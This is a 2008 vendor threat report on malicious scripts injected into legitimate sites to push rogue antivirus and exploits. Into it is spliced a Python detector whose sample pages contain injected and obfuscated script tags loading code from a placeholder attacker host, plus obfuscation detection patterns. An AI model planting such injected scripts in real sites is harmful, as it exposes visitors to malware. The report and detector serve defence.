Attack Intelligence Research Center Monthly Threat Report
MalWeb Continues to Make Waves on Legitimate Sites
RESEARCH PAPER
Aladdin.com/eSafe

Following up on some recent attacks, the AIRC team wanted to see how the Web looks these days in terms of lessons learned and the impact that MalWeb has on the average user. In completely subjective research, we hit our browsers in an attempt to emulate a benign business user and see how we would fare at finding MalWeb-infested sites. To our surprise, the past year's advances in Web security haven't really been effective: we soon came across sites such as a radio station homepage, a large franchise management site and even a couple of government sites, all infested with malicious code just waiting to attack hapless visitors.
The reason for the eclectic array of (obviously) legitimate sites is that our search terms followed the current news: career opportunities, elections and personal finance. Digging into the attacks, we realized that there isn't anything new here: the same old SQL injection into a vulnerable site, or cross-site scripting that seeded a site's cache with problematic content which then comes up in search results and exposes the visitor to MalWeb. The usual suspect this time was a single script included in all the sites mentioned above (and in about 6,000 additional ones that we did not analyze thoroughly).
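The pattern described above, one off-site script include injected into many unrelated legitimate sites, is easy to hunt for once you have the page HTML. The following scanner is an added example written for this edit; it is not AIRC's tooling and not the script from the report. It collects every <script src=...> whose host is neither the page's own host nor an allow-listed one, flags inline scripts that use the common obfuscation wrappers the report alludes to (document.write(unescape(...)), eval, String.fromCharCode, long %XX escape runs), and then reports any off-site include shared by more than one site. The hostnames, page contents and obfuscation heuristics are constructed for the example and are assumptions, not indicators from the report.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristics for the obfuscation style the report describes. These are
# assumptions made for this example, not signatures taken from the report.
OBFUSCATION_PATTERNS = {
    "document.write(unescape(": re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I),
    "eval(": re.compile(r"\beval\s*\(", re.I),
    "String.fromCharCode": re.compile(r"String\.fromCharCode", re.I),
    "long %XX escape run": re.compile(r"(?:%[0-9a-f]{2}){20,}", re.I),
}


class _ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from one page."""

    def __init__(self):
        super().__init__()
        self.external = []   # values of src= on <script> tags
        self.inline = []     # bodies of inline <script> blocks
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> content as raw data, so this is the body
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def scan_page(page_host, html, allowed_hosts=()):
    """Return a list of (kind, detail) findings for a single page.

    kind is "offsite-script" (detail = the src URL) or
    "obfuscated-inline" (detail = the heuristic name that matched).
    """
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    allowed = {page_host.lower(), *(h.lower() for h in allowed_hosts)}
    findings = []
    for src in collector.external:
        host = urlparse(src).hostname   # None for relative paths such as /js/site.js
        if host and host.lower() not in allowed:
            findings.append(("offsite-script", src))
    for body in collector.inline:
        for name, pattern in OBFUSCATION_PATTERNS.items():
            if pattern.search(body):
                findings.append(("obfuscated-inline", name))
    return findings


def find_common_includes(pages, allowed_hosts=()):
    """pages maps host -> HTML. Returns {src: [hosts]} for every off-site
    include that appears on more than one site, the report's "usual suspect"."""
    seen = {}
    for host, html in pages.items():
        for kind, detail in scan_page(host, html, allowed_hosts):
            if kind == "offsite-script":
                seen.setdefault(detail, []).append(host)
    return {src: hosts for src, hosts in seen.items() if len(hosts) > 1}


# Constructed sample pages (hostnames and content invented for this example).
SAMPLE_PAGES = {
    "radio.example": (
        '<html><head><title>Radio</title></head><body><h1>News</h1>'
        '<script src="http://stats.badhost.example/b.js"></script></body></html>'
    ),
    "gov.example": (
        '<html><body><p>Elections</p><script src="/js/site.js"></script>'
        '<script src="http://stats.badhost.example/b.js"></script>'
        '<script>document.write(unescape("%3Cscript%20src%3D%22http%3A%2F%2F'
        'stats.badhost.example%2Fc.js%22%3E%3C%2Fscript%3E"));</script>'
        '</body></html>'
    ),
    "clean.example": (
        '<html><body><script src="https://cdn.example/jquery.js"></script>'
        '<script>var a = 1;</script></body></html>'
    ),
}

if __name__ == "__main__":
    for host, html in SAMPLE_PAGES.items():
        print(host, scan_page(host, html, allowed_hosts=("cdn.example",)))
    print(find_common_includes(SAMPLE_PAGES, allowed_hosts=("cdn.example",)))
```

The allow list matters in practice: legitimate sites pull scripts from CDNs and analytics providers, so the signal is not "any off-site include" but an off-site include that appears across unrelated sites and is not on a known-good list. A newly registered host for such an include, as in the domain registered the day before in this report, would be the next thing to check.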
The funny thing about this script is that it states its intentions up front: if you do not already have AntivirXP08 installed on your PC, well, you will now! For more on rogue AV software used to socially engineer victims into installing Trojans on their PCs, see [sunbelt references]. Taking the next step to infection is as easy as doing nothing. Remember, this is MalWeb: no interaction is needed. All you need to do is VIEW the legitimate site, and the MalWeb takes care of the rest. Finally we get to the somewhat more familiar obfuscated JavaScript which, when run, is actually doing this:
1. Exploiting a QuickTime vulnerability
2. Exploiting a Microsoft WMV vulnerability
and, of course, the traditional Trojan download and silent install in the background.

Now for the really ironic part: one of the domains used in the attack had only been registered the day before (September 16th), and when looking at its homepage, another finance-related story comes up on the front page:

Looks really legitimate, and a quick search uncovers the culprit:
Looks familiar, but note that the legitimate site (as opposed to the malicious site hosting the legitimate content) has a Security Center and an Email Scam link in red, which explains that the company in question has been experiencing brand name theft: several sites hosting copies of its website content are luring unsuspecting visitors for the purpose of phishing and other financial fraud. It appears we hit a fresh one. According to research on the Web (http://www.bobbear.co.uk/nescoaccounting.html) the earlier attacks had seemingly faded out, yet this domain not only hosts the copied legitimate content, most likely for phishing, but also participates in the MalWeb-to-malware business, an interesting trend in today's turbulent economic times.

The location of the participating domains is no surprise. As usual, a capitalist economy with commoditized hosting products provides the best place to host any kind of Web content:

Looking forward

The experience from our latest Internet browsing ended up leaving somewhat of a bad taste. None of the sites we visited was flagged as it should have been by our fastidiously up-to-date browsers (we are using the latest versions of Google Chrome and Firefox). Google and Yahoo didn't object either when the results came up containing the MalWeb-serving sites. Making predictions in such a stagnant state of security is challenging; we do anticipate that more restrictions will be placed on MalWeb-serving sites, but that they will not be sufficient and will be severely delayed. Truth be told, some of the search results we received did carry warnings that malicious content might be on the site, but NONE of those sites contained the malicious scripts anymore, and even some of the sites that were not flagged were already serving clean content.
The AIRC team predicts that as long as criminals continue to generate returns on their activities as high as they do now, the methods of distribution will continue to evolve, and the context in which MalWeb is served will become more localized and more relevant to a specific period of time. You need only watch your news tickers to guess where attackers are aiming their crossbows.
About the Attack Intelligence Research Center

The Aladdin Attack Intelligence Research Center (AIRC) is a premier facility for Internet threat detection and cybercrime investigation. The mission of the AIRC is to deliver security research and intelligence that educates, supports and strengthens the security community, and drives innovation in Aladdin's content security solutions. Based in Tel Aviv, the AIRC is comprised of global security researchers and law enforcement and cybercrime specialists dedicated to finding and eradicating Internet threats that compromise legitimate business safety. AIRC goes beyond traditional threat detection to provide business intelligence around evolving threats, predict future trends in Internet security, and uncover the inner workings and effects of the business of ecrime. For more information, visit www.aladdin.com/airc.

About Aladdin

Aladdin Knowledge Systems (NASDAQ: ALDN) is an information security leader with offices in 12 countries, a worldwide network of channel partners, and numerous awards for innovation. Aladdin eToken is the world's #1 USB-based authentication solution, offering identity and access management tools that protect sensitive data. Aladdin HASP SRM boosts growth for software developers and publishers through strong anti-piracy protection, IP protection, and secure licensing and product activation. Aladdin eSafe delivers real-time intelligent Web gateway security that helps protect data and networks, improve productivity, and enable compliance. Visit www.aladdin.com.
For more contact information, visit: www.aladdin.com/contact
North America: +1-800-562-2543, +1-847-818-3800
UK: +44-1753-622-266
Germany: +49-89-89-4221-0
France: +33-1-41-37-70-30
Benelux: +31-30-688-0800
Spain: +34-91-375-99-00
Italy: +39-022-4126712
Portugal: +351-21-412-36-60
Israel: +972-3-978-1111
China: +86-21-63847800
India: +91-22-67255943
Japan: +81-426-607-191
Mexico: +52-1-55-4159-9733
All other inquiries: +972-3-978-1111

© 2008 Aladdin Knowledge Systems, Ltd. All rights reserved. Aladdin is a registered trademark of Aladdin Knowledge Systems, Ltd. All other names are trademarks or registered trademarks of their respective owners.